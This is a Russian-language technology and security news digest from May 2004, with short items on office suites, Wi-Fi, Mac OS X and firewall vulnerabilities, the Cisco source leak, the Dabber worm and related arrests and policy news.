Два новых игрока вышли на рынок делового ПО в надежде снять бизнес-стружку с доминирующего пакета Microsoft Office. Пекинская фирма Evermore Software объявила о начале продаж в США, Японии и Китае собственного пакета EIOffice 2004. На рынок делового ПО нацелилась и компания Gobe Software из Орегона, которая недавно начала продавать свой пакет GoBeProductive. Несмотря на давнее доминирование на нем Microsoft, в последнее время этот рынок, — категория программных продуктов, как правило, состоящих из текстового процессора, электронной таблицы и презентационных программ, — привлекает свежие силы конкурентов. Sun Microsystems и Corel в качестве дешевых альтернатив Microsoft Office продвигают соответственно StarOffice и WordPerfect. Сородич StarOffice с открытым исходным кодом, OpenOffice, также завоевывает признание, особенно у госучреждений и зарубежных заказчиков. Evermore применила новаторский для этого рынка подход, основав свой продукт на среде Sun Java, что означает, что один и тот же код работает как на Windows-, так и на Linux-машинах. В заявлении компании говорится, что EIOffice использует единый формат файлов для всех типов документов и позволяет читать и экспортировать документы в форматах Microsoft Office и Adobe Portable Document Format. В пакет вошли специальные инструменты для создания технических и научных документов, усовершенствованный менеджер файлов и расширенные функции вырезания-копирования для переноса текста между документами.
Подробнее

18/05/2004 18:59 "Незакрываемая" брешь в Wi-Fi 802.11b протоколе
Сразу две организации, занимающиеся безопасностью, выпустили предупреждение о уязвимости в беспроводном оборудовании основывающемся на 802.11b Wi-Fi стандарте, которая делает устройства подверженными DoS атаке. Австралийская команда "The Australian Computer Emergency Response Team" (AusCERT) выпустила в прошлый четверг секьюрити-предупреждение, а Американская - "U.S. Computer Emergency Readiness Team" (US-CERT) предупредила о потенциальной опасности для беспроводных сетей. Две организации, также как и WLAN производители, были информированы о уязвимости в ноябре, согласно Марку Луи (Mark Looi), профессору университета Queensland, под чьим руководством австралийцы Christian Wullems, Kevin Tham и Jason Smith обнаружили эту брешь. С тех пор, сообщил Луи, он и AusCERT работали с WLAN производителями для того, чтобы найти "облегчающую" стратегию для уязвимости перед тем как опубликовать результаты своего исследования. В конце концов, производители пришли к выводу, что не существует стратегии как исправить фундаментальную проблему в схеме модуляции (DSSS) 802.11b протокола, сказал Марк Луи. 802.11b WLAN сети передают данные со скоростью 11Mbit/sec. и работают с частотой 2.4-GHz. Производители сообщили что решением для пользователей может быть только переключение на устройства использющие протокол 802.11a, который использует другую форму модуляции чем 802.11b. Бюллетени безопасности за прошлую неделю информируют также что высокоскоростные версии беспроводного оборудования базирующегося на 802.11g протоколе могут быть не подвержены опасности. Но только то оборудование, которое передает данные со скоростью превышающей 20Mbit/sec. может считаться защищенным от DoS атак.
computerworld.com

18/05/2004 15:26 Transmeta добавляет антивирусную защиту в свои чипы
Производитель чипсетов Transmeta работает над добавлением новой функции в свои микропроцессоры для защиты компьютеров от атак вирусов и червей, сообщила компания в понедельник. Новая технология будет включена в процессоры Efficeon и будет работать совместно с функцией вирусной защиты, которую Microsoft планирует включить в Windows XP Service Pack 2, заплпнированном на второе полугодие 2004. "No Execute" или NX технология разработана для того чтобы помочь предотвратить переполнение буфера (buffer overflow) - распространенного типа атаки. В вируснных атаках вызванных вирусами, такими как недавний Sasser, MSBlast или Welchia в прошлом году, используется именно этот метод, сообщает Transmeta. Intel и Advanced Micro Devices говорили о реализации подобной технологии в своих процессорах еще в январе. Технология AMD "Защита от Запуска" (Execution Protection), встроенная в чип Athlon 64, разработана для защиты от переполнения буфера. Transmeta сообщила, что она предоставит расширенню версию систем на Efficeon с поддержкой NX технологии Microsoft для тестирования. Планируется, что Efficeon чипы оснащенные NX технологией будут выпущены до конца этого года.
CNET News.com

18/05/2004 12:56 Новая уязвимость в Mac OS
Lixlpixel сообщает о новой критической уязвимости в операционной системе Mac OS X, которая позволяет атакующему получить удаленный доступ к компьютеру после того как пользователь посетит веб сайт злоумышленника. Уязвимость находится в функциональности операционной системы реализующей помощь пользователю и позволяет выполнить произвольный локальный скрипт на машине пользователя. Проблема состоит в том, что обработчик "help" URI позволяет выполнять произвольные скрипты (.scpt) через функцию "help:runscript". Настройки по умолчанию в веб-броузерах Internet Explorer и Apple Safari позволяют пользователям скачать и запустить вредоносный скрипт одним кликом мыши. Пользователи могут изменить настройки броузеров чтобы предотвратить атаку.
Источники: Secunia Advisory: SA11622, techworld.com, theinquirer.net

18/05/2004 12:40 Русские хакеры арестованы в Испании
По сообщению crime-research.org, 13 мая испанская полиция арестовала в Барселоне трех русских по подозрению в участиии в организованной криминальной группировке. Эта группировка подозревается в похищении более 500 тыс. евро с банковских счетов путем незаконных махинаций в Интернет. Два эстонца и один гражданин Доминиканской республики также входили в преступную группировку, сообщает радиостанция Cadena SER. Похищенные деньги перенаправлялись в Россию, говорит полиция. Главари банды находились в Англии. Группа работала в Испанской Каталонии, Валенсии и Андалусии. Интернет-мошенники также имели сообщников в США, Австралии и Новой Зеландии. Полицейская операция под названием "Fesca" была успешно осуществленна благодаря взаимодействию местных правоохранительных органов во всех этих странах, а также в России. Испанская полиция утверждает, что это была самая масштабная операция по поимке Интернет преступников. В тоже время глава полиции Барселоны отказался назвать имена задержанных русских и даже не сообщил были ли они гражданами России или стран СНГ.
crime-research.org

18/05/2004 12:34 Red Hat добавила в свои дистрибутивы Linux поддержку 64-разрядных процессоров
Компания Red Hat обновила свои дистрибутивы ОС Linux серий Enterprise Linux и Fedora продуктами с поддержкой 64-разрядных процессоров компаний AMD и Intel. В полной мере использовать возможности таких процессоров сможет дистрибутив Red Hat Enterprise Linux 3 Update 2, выпущенный на прошлой неделе. Помимо Opteron и 64-разрдного варианта Xeon, дистрибутив поддерживает блейд-серверы IBM серии JS20 на процессорах серии Power РС. Кроме того, в скором времени будет выпущена новая версия бесплатного дистрибутива Fedora Core 2, на котором в Red Hat проводит апробацию новых технологий. Fedora распространяется бесплатно, но лишена долгосрочной поддержки, предоставляемой пользователям платных дистрибутивов. Fedora Core 2 станет первым продуктом, созданным под эгидой Red Hat, где будет использоваться ядро Linux версии 2.6. До сих пор ядро 2.6, появившееся в конце 2003 года, было включено в единственный крупный дистрибутив - SuSE Linux, выпускаемый сейчас компанией Novell.Red Hat же с переходом на новое ядро не спешит. Пока версия ядра 2.6 будет применяться только в Fedora, а в Red Hat Enterprise Linux ее появления стоит ожидать не ранее 2005 года. Тем временем, в обновлении к платной версии дистрибутива Red Hat появятся версия 1.1 пакета OpenOffice, а также коммерческая коллекция шрифтов Agfa Monotype, пакеты Macromedia Flash и Citrix ICA.
compulenta.ru

18/05/2004 09:10 Углублённый взгляд на Windows XP SP2
Microsoft рассказала о своём продукте Service Pack 2 и дала некоторые серьёзные намеки на то, чего пользователи могут ожидать от готовящегося к выпуску обновления, ориентированного на повышение безопасности. Cообщение Редмонда заключается в том, что SP2 — не просто набор заплаток; это всесторонне усовершенствованный код средств защиты и других программных компонентов — например, модернизированный пользовательский интерфейс настройки беспроводных локальных сетей. SP2 вносит в систему изменение, которое временно называется delta patching (к моменту выпуска сервисного пакета Microsoft обещает заменить этот термин чем-нибудь «более обтекаемым») и в результате которого патчи будут загружать файлы не целиком, а только дополнения к ним. Microsoft утверждает, что это новшество сократит время загрузки на 80% и нацелено на тех, кто пользуется dial-up доступом. Будет изменен и брандмауэр Windows (стараниями гениев корпоративного брендинга он в стиле Snickers/Marathon переименован из Internet Connection Firewall в Windows Firewall), который по умолчанию будет включён, если в системе не установлен другой брандмауэр. По словам технического специалиста Microsoft Дэвида Овертона, число предприятий, использующих корпоративные брандмауэры для настольных ПК, «гораздо меньше, чем хотелось бы». На машинах с установленным SP2 брандмауэр станет приложением, загружаемым в первую очередь. Этот урок Microsoft получила от вируса Blaster, которому задержки между загрузкой машины и включением брандмауэра достаточно, чтобы дать злоумышленникам забраться в систему. Кроме того, по умолчанию все порты будут закрыты, за исключением тех, что нужны приложениям для отправки данных — чтобы подавить новые вирусы, производящие зомби. Продакт-менеджер Windows XP Пол Рэндл сказал, что SP2 будет держать пользователей «на шаг впереди» вирмейкеров, но не избавит от них совсем. «Серебряной пули нет — мы не говорим, что установка Service Pack 2 даёт полную гарантию от вирусных атак». И хотя браузер MSN уже давно блокирует pop-up рекламу, SP2 идет по этому пути ещё дальше. Будут пресекаться все любимые трюки авторов adware и spyware — Microsoft обещает: никаких pop-unders, никакой нежелательной флэш-рекламы, никаких объявлений, выходящих за пределы экрана, так что нельзя найти закрывающей кнопки, и вообще ничего такого. Любители флэш всё же смогут изменить настройки, разрешив определенным сайтам показывать подобные объявления — при помощи списков разрешений и ссылок, открывающих сайты в подокнах, допускаемых авторами SP2.
Подробности

17/05/2004 17:49 Cisco подтвердила утечку кода
По крайней мере, подтверждена аутентичность двух опубликованных исходников. Ведется работа по поиску источника утечки, сообщает bugtraq.ru. По мнению экспертов, Cisco находится в лучшей ситуации, чем Microsoft после утечки ее исходников - хотя бы потому, что круг людей, способных отыскать возможные уязвимости, или даже просто попробовать их в боевых условиях, в данном случае гораздо более узок. Между прочим, и с майкрософтовскими исходниками апокалиптические предсказания паникеров не слишком подтвердились.
Подробности

17/05/2004 17:07 Антивирусная защита AOL заблокировала миллиард писем с вирусами
Интернет-провайдер America Online (AOL) в течение 12 месяцев заблокировал более 1 миллиарда электронных писем с вирусными приложениями. Таким образом, с момента предоставления своим клиентам антивирусной защиты AOL оградил каждого из них в среднем от 30 вирусных атак или одной вирусной атаки раз в 10 дней, отмечают в пресс-службе компании. «По мере того, как мы продвигаемся в мир высоких скоростей, антивирусная защита приобретает еще более критическое значение. Высокоскоростное соединение может оставить пользователей беззащитными перед хакерами и вирусными атаками», - отметили представители провайдера. В AOL подчеркнули, что предоставляют своим клиентам не только антивирусную защиту, но и активно защищают их от спамовых рассылок, хакеров и шпионских программ.
Источник

17/05/2004 16:26 Лужков предложил ограничить пользование интернетом
Юрий Лужков предложил принять ряд комплексных мер "юридического и законодательного характера" с целью навести порядок в интернете. Об этом говорится в статье московского мэра, опубликованной в понедельник в газете "Известия". В частности, он считает необходимым лицензировать интернет-провайдеров и регистрировать сетевые средства массовой информации. По мнению Лужкова, должна быть разработана юридическая процедура, предусматривающая закрытие интернет-изданий в случае несоблюдения ими законов. Лужков категорически выступает против анонимности авторов сайтов, что позволяет им заниматься "черным пиаром", размещать материалы порнографического характера и нарушать авторские права писателей и музыкантов. В статье также говорится о том, что новое законодательство должно защитить провайдеров 'путем введения строгих наказаний за попытки взлома сайтов, за насильственную, с помощью технических ухищрений, фальсификацию их содержания, за создание сайтов-двойников и т.д." Лужков отмечает, что согласно существующему Закону О СМИ непонятно, относятся ли интернет-издания к "иным средствам массовой информации". Поэтому на первом этапе в законе необходимо юридически прописать интернет "отдельной строкой" с учетом всех особенностей сетевой журналистики. В дальнейшем речь может пойти и о разработке специального закона об интернете, поскольку его целесообразность "не ставится под сомнение ни специалистами, ни многими законодателями".
Источник

17/05/2004 14:14 Безопасность и поддержка 64 бит в новом процессоре Intel
13 мая в Нью-Йорке прошла традиционная весенняя встреча аналитиков, где президент и главный управляющий компании Intel Паул Отелини (Paul Otellini) сообщил, что в этом году Intel Corp. включит функцию безопасности и 64-битное расширение в ядро Prescott для персональных и серверных рещений на базе чипсетов Prescott и Grantsdale. Prescott поддерживает NX (no execute) функцию, которая предотвратит выполнение опасного кода вирусов и червей использующих переполнение буфера. Процессоры Athlon 64 и Opteron фирмы AMD также содержат эту функцию. NX требует поддержки со стороны программного обеспечения, которая будет доступна лишь в Windows XP Service Pack 2. Как ожидается этот SP2 не выйдет ранее второй половины года. Intel уже разрабатывала процессоры с встроенными технологиями, которые были отключены до тех пор пока программное обеспечение не становилось способным поддерживать новую функцию. Недавний пример этому - Hyperthreading. Расширенная технология - другая особенность, которая сейчас отключена в процессорах Prescott, но будет активирована в следующих релизах. Первые процессоры Intel для серверов и рабочих станций с 64 битным расширением для набора инструкций x86 будут выпущены в слеующем месяце, сказал Паул Отелини.
computerworld.com

17/05/2004 14:13 Иски к электронным библиотекам рушатся на глазах
Дело об исках к электронным библиотекам, которое получило столь громкую огласку в самом начале, рассыпается прямо на глазах. Напомним, что компания "КМ онлайн" подала в суд от имени известных авторов на владельцев некоторых бесплатных электронных библиотек. Среди ответчиков присутствуют "Библиотека Мошкова" и "ЛитПортал". В общей сложности сумма ущерба, которую КМ требует с библиотекарей, составляет полмиллиона долларов США. Но ожидания компании не оправдались. С началом судебных слушаний стало ясно, что иски составлены неграмотно и содержат недопустимые ошибки. Например, в исковых заявлениях к Алексею Кузьмину, владельцу "ЛитПортала", вообще были перепутаны названия произведений и адрес сайта. Вместо litportal.ru был написан адрес "Библиотеки Мошкова", а вместо произведения Елены Катасоновой, от имени которой был подан иск, в заявлении почему-то упоминается роман Эдуарда Геворкяна. Все это выяснилось на предварительном слушании, которое прошло 13 мая. Судьи с негодованием отнеслись к ошибкам, которые допустили юристы НП НОЦИТ. Эта организация, созданная "КМ онлайн", занимается "защитой" авторов в суде. К примеру, на слушании в Воронежской области, судья решила оставить иск без движения на основании того, что "личность истца не подтверждена, а также потому что представленные истцом доказательства не могут быть использованы в качестве основания для иска".
compulenta.ru

17/05/2004 14:12 В России станет на двух сотовых операторов меньше
До конца этого года несколько десятков тысяч московских абонентов сотовой связи должны выбрать, к сети какого оператора им подключиться, так как в 2004 году компании ЗАО "МСС" и ОАО "Персональные коммуникации" (торговая марка "Сонет") исчезнут. Больше всего перемены коснутся около 80 тыс. абонентов "Сонета", поскольку переход МСС под новый бренд "Скайлинк" происходит более плавно. Абонентам "Сонета" предложено стать пользователями услуг того же "Скайлинка" - им обещаны льготы при замене телефонных аппаратов. Скорее всего, к "Скайлинку" уйдут те, кому нужен высокоскоростной мобильный интернет и кто привык использовать безлимитные тарифные планы. "Сонет" всегда позиционировался как оператор для тех, кто много говорит и согласен за это платить больше: ARPU (среднемесячный доход в расчете на одного абонента) этого оператора равен примерно $60, а у GSM-операторов - не более $20. Более молчаливые абоненты "Сонета" станут клиентами МТС, "Вымпелкома" и "Мегафона".
izvestia.ru

17/05/2004 14:10 Вьетнам контролирует своих интернет-пользователей
Во Вьетнаме введено новое ограничение при пользовании Интернет направленное против инакомыслящих, использующих сеть для своих высказываний против правительства. Перед тем как начать пользоваться интернетом, посетители интернет-кафе должны предоставить персональную информацию, которая должна храниться 30 дней. Вся интернет активность будет прослеживаться. Владельцы кафе обязаны хранить данные о том сколько времени каждый пользователь провел в интернете. Они также обязаны поддерживать и своевременно обновлять ПО предотвращая обход фаерволов и т.п. Те, кто не выполнит требования могут быть оштрафованы на $3,200 или подвергнутся судебному преследованию. Инернет не может быть использован для разглашения государственных секретов, говорит источник. Около 4 млн вьетнамцев из 81 миллионного населения страны имеют сейчас доступ к интернет.
usatoday.com

16/05/2004 15:57 Новая инициатива министерства энергетики США
Министр энергетики США Абраам Спенсер выступил с предложением организации новой программы, цель которой - усиление защиты сетей и компьютерной инфраструктуры министерства энергетики и связанных с ним служб и структур. Связано это с тем, что (помимо прочего) в сферу деятельности министерства включено всё, что касается ядерной промышленности. В рамках программы, в частности, предусмотрены следующие шаги. Создание специализированных подразделений компьютерной безопасности для защиты компьютерных сетей министерства (наподобие военных подразделений Delta Force и Navy SEAL, предотвращающих физическое проникновение на охраняемые объекты инфраструктуры). Предложено централизировать материалы о различных ядерных программах на меньшем количестве сайтов, для чего убрать различные материалы из Los Alamos National Laboratory's Technical Area 18, Sandia Pulse Reactor facility in New Mexico, Y-12 National Security Complex in Tennessee, Lawrence Livermore National Laboratory и разместить в одном месте (о расположении которого не сообщается ;)). Оснастить файрволлы и маршрутизаторы системами определения атак (IDS). Считать приоритетным работу доступных из внешнего мира машин на бездисковых рабочих станциях. Отойти от систем аутентификации при помощи электронных ключей и пластиковых карточек к более совершенным системам, застрахованным от случаев потери (или воровства) ключей, используемых при авторизации. Усилить подготовку и отвественность персонала, отвественного за защиту и отражение кибератак. Мероприятия по претворению новой программы в жизнь намечено закончить в следующем году.
Пресс-релиз DOE

16/05/2004 15:10 Подробности уязвимости в IEEE 802.11
Опубликовано подробное описание уязвимости в протоколе беспроводного доступа (WLAN) IEEE 802.11, о которой мы писали ранее. Описание опубликована Австралийским центром компьютерной безопасности (AusCERT), располагающимся в университете Куинслэнда. Как и отмечалось ранее уязвимость связана с протоколом низкого уровня сетевой модели OSI - MAC (Media Access Control). Сама уязвимость присутствует в процедуре CCA (Clear Channel Assessment), выполняемой на физическом уровне DSSS (Direct Sequence Spread Spectrum). Уязвимость позволяет провести атаку как на клиентскую чать беспроводных сетей, так и на точки доступа (AP - access points), эффективность обусловлена только типом передаваемых данных и длительностью атаки. Ещё раз подчёркивается, что проведение атаки не требует больших финансовых затрат и высокой квалификации (мы также писали об этом ранее). Тем не менее, существует ряд условия, которые необходимо выполнить для достижения максимальной эффективности атаки (они описаны в документе).
Описание уязвимости

16/05/2004 14:35 Кое-что о PlayStation Portable
Sony показала новинку – PlayStation Portable (PSP), развеяв тем самым ряд слухов и породив пищу для новых. Устройство работает под управлением двух процессоров. Первый – 333 мегагерц – основной, а второй – 166 мегагерц – предназначен для мультимедиа функций (в том числе заменяет видеоускоритель). Дисплей с диагональю 4.5 дюйма и разрешением 480 х 272 (16:9) достаточно неплох для такого устройства. Компания заявляет о поддержке MPEG4 видео, Dolby 7.1 аудио, 3D звучания, а также форматов ATRAC3, AAC и MP3.
mobile-review.com

16/05/2004 13:20 HawkinsOS — корпоративная версия FreeBSD
Увидела свет HawkinsOS — универсальная корпоративная операционная система, сообщает nixp.ru. Позволяет использовать один источник для обновлений, докментации, поддержки и других ресурсов. Покупая пакет HawkinsOS, вы получаете имя пользователя и пароль, с помощью которого уже и сможете работать с системой. HawkinsOS основана на FreeBSD и совместима с ней на 100%, позволяет запускать тысячи приложений и является «чрезвычайно» функциональной. Проста как в текстовом режиме установки, так и в использовании вообще. Разработчики утверждают, что, по сравнению с основными своими конкурентами (Linux™и Windows), HawkinsOS намного более зрелая и стабильная. Ее истоки восходят к BSD-версии UNIX, созданной в конце 1970-х. Стоимость одного пакета HawkinsOS с «базовой поддержкой» составляет $132 в год.
Сайт проекта

16/05/2004 12:49 Реалии и мифы кибертерроризма
Террористы все чаще используют новейшие информационные технологии для своих планов. Угроза кибертерроризма или использования сетевых инструментов для вывода из строя критически важных компонентов национальной инфраструктуры с целью принуждения или устрашения постоянно возрастает. Наряду с этим, вокруг кибертерроризма возникло немало мифов. Понятие кибертерроризма, покинув границы фантастических романов, уже широко обсуждается в СМИ, на правительственном и корпоративном уровне. Угроза кибератак вполне реальна, а связанные с ней риски оцениваются специалистами как высокие. С другой стороны, вокруг понятия кибертерроризма очень много мифов и спекуляций. Неадекватная оценка рисков кибертерроризма связана с тем, что для их правильной оценки необходимо определить вероятность успешного осуществления кибератаки и величину возможного ущерба. Первая величина может быть адекватно оценена только после комплексного обследования защищенности компьютерной сети. Оценить же ущерб от кибератаки может только владелец, либо управляющий системы, против которой осуществляется атака. Кроме того, поскольку практически ни одна серьезная кибератака не обходится без: «человеческого фактора», применения методов социальной инженерии и «инсайдерской информации», оценка риска существенно усложняется. Наиболее уязвимой к кибератакам, по мнению экспертов, является инфраструктура самой Сети. Некоторые уязвимости могут приводить к серьезным последствиям и при отсутствии кибератак. Показателен пример, когда инженер одного из Internet-провайдеров изменил две строки кода в конфигурации маршрутизатора, что привело к остановке почты всей Глобальной сети на три часа. Тем не менее, несмотря на всю серьезность происшедшего, катастрофичным данный инцидент назвать нельзя. Совокупный ущерб оказался таким большим за счет того, что незначительный урон был нанесен большому количеству компаний одновременно.
Источник

16/05/2004 12:30 Полиция Германии арестовала автора троянца Agobot
Полиция немецкого города Вальдсхут арестовала 7 мая 21-летнего мужчину, подозреваемого в создании троянской программы Agobot, сообщается в пресс-релизе производителя антивирусного программного обеспечения - компании Sophos. Задержанный признал свою причастность к авторству Agobot. Полицейские конфисковали у него компьютер и намерены тщательно изучить хранящиеся на нем данные. В Sophos отмечают, что говорить о причастности задержанного к созданию всех версий Agobot пока преждевременно. Власти особо подчеркнули, что никакой связи между подозреваемым в создании «троянца» и 18-летним Свеном Яшаном, подозреваемым в авторстве Sasser, не обнаружено.
Источник

16/05/2004 11:51 Утечка исходного кода CiSCO IOS?
Как стало известно SecurityLab, 13 мая 2004 года были украдены все исходные коды операционной системы CISCO IOS 12.3, 12.3t, которая используется в большинстве сетевых устройств компании CISCO. Полный объем украденной информации составляет около 800Мб в архиве. По имеющейся информации, утечка фрагментов исходного кода произошла из-за взлома корпоративной сети Cisco System. Представители Cisco System пока никак не комментируют произошедший инцидент. Информация утекла от некого человека под ником franz на #darknet@EFnet IRC где он и предоставил небольшую часть исходных кодов (около 2.5 Мб) в качестве доказательства. Исходные коды двух файлов, связанных с реализацией стека протоколов IPv6 приведены на сайте. Хотелось бы отметить, что кража исходных текстов IOS может обернуться для всего Интернет-сообщества очень серьёзными последствиями, потому что большинство маршрутизаторов (в том числе и магистральных) построено на базе "железа" фирмы CISCO. Доступ к исходным кодам может увеличить количество уязвимостей, находимых в IOS.
Подробности

16/05/2004 00:32 Выход журнала Crypto-Gram
По традиции, 15 мая был выпущен очередной номер ежемесячного электронного журнала Crypto-Gram, посвящённого вопросам криптографии и компьютерной безопасности. В этом номере: Warrants as a Security Countermeasure; Counterterrorism in Airports; Crypto-Gram Reprints; News; Counterpane News; Security Notes from All Over: Bypassing the USPS; The Doghouse: Markland Technologies; The Doghouse: IQ Networks; National Security Consumers; Comments from Readers.
Crypto-Gram

15/05/2004 16:30 Японские ученые разработали новую технологию кодирования данных
Сотрудники Национального научно-исследовательского института передовых промышленных технологий, расположенного в городе Цукуба (префектура Ибараки), объявили о том, что им удалось создать самую быструю в мире квантовую технологию криптографии, которую можно применять как для шифровки, так и для дешифровки дипломатической, военной и финансовой информации самого конфиденциального характера. Ученые японских, американских и европейских компаний вели напряженную работу по созданию системы квантовой криптографии, которая позволила бы оперативно отправлять зашифрованные данные по кабелю из оптического волокна. Зашифрованная информация уже сейчас передается по интернету, однако новая технология позволяет создать и "ключ", необходимый для кодирования и расшифровки сообщения, который сообщается адресату перед отправкой сообщения по открытым каналам. Акио Ёсидзава и группа его сотрудников создали технологию, которая позволяет подобрать ключ к шифровке примерно в 100 раз быстрее, чем все существующие методы. До настоящего времени, чтобы при помощи метода квантовой криптографии послать несколько страниц текста объемом в 60 кб на расстояние 100 км, требовалось затратить много времени и усилий. И хотя сам зашифрованный документ можно послать по интернету сравнительно быстро, обычно надо затратить около 13 часов, чтобы подобрать ключ для расшифровки и благополучно передать его адресату. С помощью новой технологии шифровальный ключ можно послать уже через восемь минут.
Подробности

15/05/2004 14:21 Эксплоит уязвимости в ПО Symantec.
eEye Digital Security были обнаружены уязвимости в продуктах компании Symantec. К такому ПО относится Symantec Norton Internet Security (в том числе Proffesional), Symantec Norton Personal Firewall, Symantec Client Firewall, Symantec Client Security и Symantec Norton AntiSpam. Одна из уязвимостей заключается в некорректной обработке специльным образом сформированных DNS-ответов, что позволяет вызвать в ПО Symantec вход в бесконечный цикл с исчерпанием через определённый промежуток времени всей доступной ОС памяти, послествия чего очевидны. Некто с ником "houseofdabus HOD" (судя по адресу - наш соотечественник) написал эксплоит этой уязвимости. Собирается на платформах Win32/VC++, Win32/cygwin, Linux.
Исходный текст эксплоита

15/05/2004 13:17 Борцы со спамом проникают в спам-клубы
Активисты из антиспамерских организаций проникли в несколько спамерских онлайновых форумов "только для своих" - так, по крайней мере, заявил представитель одной из них, Стив Линфорд. По его словам, спамеры уже в курсе случившегося, но пока не определили "засланных казачков". Цель подобных действий - поддержание атмосферы нездоровой паранойи в спамерской среде, а также приобщение к последним техническим решениям, которые используются спамерами.
bugtraq.ru

15/05/2004 13:03 Выход Apache 1.3.31.
Apache Software Foundation cовместно с Apache HTTP Server Project анонсировала выходновой версии популярного Вэб-сервера с открытым исходным кодом Apache 1.3.31. Помимо устранения различных багов, обнаруженных в работе предыдущих версий, устранены 4 уязвимости. Всем администраторам серверов настоятельно рекмондуют обновиться.
Анонс

15/05/2004 12:41 Конференция для Java-разработчиков
Корпорация Sun Microsystems приглашает Вас принять участие в конференции "Конференция для Java-разработчиков". В ходе конференции Вы сможете узнать больше о будущем технологий Java, о перспективах развития технологии и о создании различных приложений. На конференции создатели технологии, Java-гуру корпорации Sun Microsystems Саймон Риттер и Кейси Чен, расскажут о новых возможностях и перспективах развития Java. Также Вы сможете ознакомиться с преимуществами новой версии операционной системы Solaris 10 и получить собственную копию с полугодовой лицензией. Мероприятие состоится 25 мая 2004 года с 11.00 до 18.30 в конференц-зале "Amber-плаза", ул. Краснопролетарская, д. 36 (ст.м. Новослободская или Менделеевская). Начало регистрации в 10:30
Подробности о конференции

15/05/2004 12:12 Завершен монтаж самого мощного в США вычислительного кластера
В Ливерморской национальной лаборатории имени Лоренса Министерства энергетики США завершен монтаж нового суперкомпьютера под названием Thunder. Новинка представляет собой кластер на 4096 процессорах Intel Itanium 2. В качестве узлов кластера используются четырехпроцессорные серверы California Digital 6440. Для соединения узлов между собой используется система QsNet(II) фирмы Quadrics, обеспечивающая минимальные задержки при обмене данными между узлами. Объем дисковой памяти может достигать 75 терабайт. По производительности Thunder превосходит любой Linux-кластер, имеющийся в Северной Америке. Более того, данный суперкомпьютер будет претендовать на второе место в списке пятисот мощнейших суперкомпьютеров мира. По производительности, выраженной в триллионах операций с плавающей запятой в секунду Thunder уступает лишь лидеру рейтинга Top 500 - японскому суперкомпьютеру Earth Simulator. Заявленная создателями Thunder производительность составляет 19,94 терафлопс, а Earth Simulator способен выполнить 35,86 триллионов операций в секунду. Напомним, что производительность в рейтинге Top 500 традиционно определяется по тесту Linpack. Новый суперкомпьютер будет использоваться для решения самых разных несекретных научных и инженерных задач в рамках программы Multiprogrammatic & Institutional Computing (M&IC). Стоит также отметить, что Министерство энергетики США начало работы по созданию еще более мощного гражданского суперкомпьютера, который разместится в Оукриджской национальной лаборатории и будет иметь производительность в 50 терафлопс.
Описание Thunder

15/05/2004 11:38 Госдума разместила международные правовые акты в Интернете
Госдума предоставила интернет-пользователям доступ к 700 основным международным правовым актам. Документы размещены в базе данных "Международные правовые акты" на сайте нижней палаты парламента. Базу данных обслуживает информационно-поисковая система "Закон" правового управления Госдумы. Как сообщает РИА "Новости", в нижней палате состоялась также презентация компакт-дисков "Международные правовые акты" и "Европейская конвенция о защите прав человека", включающих в себя более 1400 документов. Как заявил на презентации бывший спикер палаты Геннадий Селезнев, "создание такой базы данных будет способствовать тому, что законодательная деятельность Госдумы станет более открытой как для граждан, так и для тех, кто профессионально занимается международным правом".
Правовая база

15/05/2004 02:58 Баг в Google позволил удалить сайт Microsoft-а
INQUIRER сообщает, что в Google обнаружен баг, позволяющий посторонним удалять чужие сайты. Согласно нескольким сообщениям, одним из первых от ошибки в системе удаления страниц Google пострадал сайт www.microsoft.com. Эта система позволяет вебмастерам запрашивать Google удалять домашние страницы сайтов на которых нет index.htm. Баг уже исправлен.
theinquirer.net

15/05/2004 02:57 Yahoo увеличивает размер почтовых ящиков в ответ Google
Yahoo сообщил в четверг о том что собирается провести рекламную акцию и увеличить размер почтовых ящиков в своем e-mail сервисе этим летом, также как и Google, аннонсировавший, но пока не закончивший свой почтовый сервис Gmail. Web портал, поисковый и почтовый веб-сервис Yahoo Mail увеличит размер хранилища для электронных сообщений со скромных значений, которые доступны сегодня: 4MB - 100MB, сообщил в среду на брифинге представитель Yahoo аналитикам Wall Street. "Premium" подписчики, кто платит сейчас $19.79 - $49.79 ежегодно за 25MB - 100MB пространства, получат "виртуально неограниченное" пространство, сообщает Yahoo. Yahoo планирует развернуть новые хранилища в этом или следующем квартале. Эти действия - реакция на действия на Gmail, бесплатный почтовый веб-сервис, который пока еще находится в стадии бета-тестирования. Одна из самых привлекательных особенностей Gmail-а - размер почтового ящика 1GB.
crn.com

15/05/2004 02:55 Новый червяк использует уязвимость в вирусе Sasser
Новый интернет червяк распространяется благодаря использованию уязвимости в коде червя Sasser. Новый вирус, предварительно получивший название Dabber, использет преимущество уязвимости в FTP-сервер компоненте червя Sasser и, теоретически, может поразить тысячи компьютеров уже инфицированных червем Sasser. По-видимому, Dabber первый червяк который распростряняется используя ошибку в коде другого червя, говорится в сообщении LURHQ Corp., компании, занимающейся компьютерной безопасностью. Вирус сканирует сеть и ищет компьютеры с открытым портом 5554 определяя таким образом компьютеры работающие под управлением Windows и инфицированные Sasser. Затем, найдя уязвимый хост, червь коннектится к FTP серверу и передает файл package.exe, запускается, инсталлирует себя в Windows и убивает процесс червя Sasser, предотвращяя тем самым повторную передачу. Dabber открыват TCP порт 9898 как back door. До вчерашнего дня Dabber распространялся не слишком быстро, но число инфицированных компьютеров неуклонно растет, сообщает LURHQ.
computerworld.com

14/05/2004 14:09 Уязвимость в Agnitum Outpost Firewall Pro
Обнаружена уязвимость в популярном персональном файрволле Agnitum Outpost Firewall Pro. Armin
Pelkmann из SecuriTeam обнаружил, что если удалённо посылать пакеты с установленными TCP-флагами URG, PSH, SYN, и FIN и при этом подставлять случайные IP-адреса отправителя (IP-ipspoofing) небольшого размера и при этом посылать их со скоростью 90кБ/сек - происходит типичный DoS файрволла. Подобная ситуация возникает ввиду того, что Outpost выделяет под каждый из пакетов определённое количество памяти и, таким образом, при переполнении памяти происходит типичный отказ в обслуживании. Хотелось бы заметить, что ранее нечто подобное наблюдалось в результате SYN-flood атаки и сейчас большинство Ос имеют противоядие против подобных атак. Уязвимость обнаружена в версии 2.1 Agnitum Outpost Pro. В качестве временного противоядия рекомендуется в файле outpost.ini установить параметры: HideIcmpActivity=yes, HideIpActivity=yes, правда, не совсем понятно, как это скажется на функционировании самого файрволла (то, есть, блокировать он, конечно, будет, однако без всякой информации хозяину компьютера, насколько можно судить из смысла параметров).
Описание

14/05/2004 11:55 Открылся хакерский университет
